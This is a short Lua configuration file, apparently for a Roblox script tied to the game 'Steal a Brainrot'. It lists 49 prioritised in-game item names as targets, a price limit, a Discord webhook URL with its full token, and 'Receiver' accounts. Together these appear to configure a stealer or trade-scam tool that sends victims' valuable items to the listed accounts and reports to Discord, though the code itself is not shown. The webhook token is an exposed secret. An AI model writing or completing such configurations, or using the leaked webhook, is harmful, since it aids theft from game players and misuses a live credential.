config.PRICE_LIMIT = 10_000_000
config.WEBHOOK = "https://discord.com/api/webhooks/1416064670598565959/gCvLihXvyqIuE-NqwUP7XrbFSw9Yj0DJCoy9eez0ysXeG9j2_YolynrALL0qZGMQJc-O"

config.targetNames = {
    {name = "Strawberry Elephant", priority = 1},
    {name = "Meowl", priority = 2},
    {name = "Dragon Cannelloni", priority = 3},
    {name = "Headless Horseman", priority = 4},
    {name = "Capitano Moby", priority = 5},
    {name = "Fragrama and Chocrama", priority = 6},
    {name = "Garama and Madundung", priority = 7},
    {name = "La Supreme Combinasion", priority = 8},
    {name = "Burguro And Fryuro", priority = 9},
    {name = "La Casa Boo", priority = 10},
    {name = "Spooky and Pumky", priority = 11},
    {name = "La Secret Combinasion", priority = 12},
    {name = "La Taco Combinasion", priority = 13},
    {name = "Ketchuru and Musturu", priority = 14},
    {name = "Tralaledon", priority = 15},
    {name = "Los Spaghettis", priority = 16},
    {name = "Spaghetti Tualetti", priority = 17},
    {name = "Chillin Chili", priority = 18},
    {name = "Chipso and Queso", priority = 19},
    {name = "La Spooky Combinasion", priority = 20},
    {name = "La Extinct Grande", priority = 21},
    {name = "Ketupat Kepat", priority = 22},
    {name = "Tictac Sahur", priority = 23},
    {name = "Nuclearo Dinossauro", priority = 24},
    {name = "Los Primos", priority = 25},
    {name = "Los Tacoritas", priority = 26},
    {name = "Eviledon", priority = 27},
    {name = "Los Bros", priority = 28},
    {name = "Los Hotspotsitos", priority = 29},
    {name = "Tacorita Bicicleta", priority = 30},
    {name = "Money Money Puggy", priority = 31},
    {name = "Los Puggies", priority = 32},
    {name = "Las Sis", priority = 33},
    {name = "Esok Sekolah", priority = 34},
    {name = "La Grande Combinasion", priority = 35},
    {name = "Los Spooky Combinasionas", priority = 36},
    {name = "Los 67", priority = 37},
    {name = "Los Combinasionas", priority = 38},
    {name = "Los Nooo My Hotspotsitos", priority = 39},
    {name = "Los Mobilis", priority = 40},
    {name = "67", priority = 41},
    {name = "Mariachi Corazoni", priority = 42},
    {name = "Los Chicleteiras", priority = 43},
    {name = "Quesadillo Vampiro", priority = 44},
    {name = "Mieteteira Bicicleteira", priority = 45},
    {name = "Secret Lucky Block", priority = 46},
    {name = "Quesadilla Crocodila", priority = 47},
    {name = "Burrito Bandito", priority = 48},
    {name = "Swag Soda", priority = 49},
}

config.Displayname = { "OzlKDVna", "aimabtdc730", "thaitaptap2", "Betonamuontop", "Vietpet99_01" }
config.Receiver = { "ThaiBeo01", "ThaiBeo02", "OzlKDVna", "vietpet99_01", "Betonamuontop" }
return config
